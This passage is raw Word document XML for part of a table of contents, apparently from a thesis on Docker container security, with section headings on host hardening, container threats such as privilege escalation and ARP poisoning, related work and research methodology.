              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A0E1BBA" w14:textId="1E95C989"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897" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Host Hardening</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_Toc87032897 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A4A7287" w14:textId="6C5EBB21"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898" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Network Isolation</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_Toc87032898 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15189B95" w14:textId="607B5A89"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899" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5 DOCKER SECURITY THREATS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_Toc87032899 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C156464" w14:textId="4545D9DE"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00" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Container Privilege Escalations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_Toc87032900 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BB93230" w14:textId="02D6DDB5"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01" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Poisoned Images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_Toc87032901 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AC7179B" w14:textId="4056212D"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02" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.3</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Denial of Service (Dos)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_Toc87032902 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22E169AE" w14:textId="235C7B17"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03" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.4</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> ARP Poisoning</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_Toc87032903 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C9FFFEB" w14:textId="5EDAF9AB"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04" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.5</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Man-In-The-Middle Attack</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_Toc87032904 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6129ADB1" w14:textId="0CCD50E4"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05" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.6</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Secret compromises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_Toc87032905 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16F9388B" w14:textId="6BAAA3A8"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06" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY</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_Toc87032906 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71FAECC8" w14:textId="49B569F5" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032907" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 3</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - RELATED WORK</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_Toc87032907 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="425AAF04" w14:textId="3170D1F3"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08" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>OVERVIEW</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_Toc87032908 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BF8F7C2" w14:textId="4541034D"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09" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 LITERATURE REVIEW</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_Toc87032909 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09459603" w14:textId="52F710EA"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10" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Container vs Virtualisation</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_Toc87032910 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D989DF9" w14:textId="4B055B26"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11" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Docker Inside Threats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_Toc87032911 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72F12BBA" w14:textId="5F1C9DC8"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12" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.3</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Docker Outside Threats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_Toc87032912 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29276958" w14:textId="2B72CFB9"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13" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY</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_Toc87032913 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="680128A9" w14:textId="4DF48BF7" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032914" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 4</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> – RESEARCH METHODOLOGY</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_Toc87032914 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F81D77B" w14:textId="2FA7A0A2"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15" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>OVERVIEW</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_Toc87032915 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
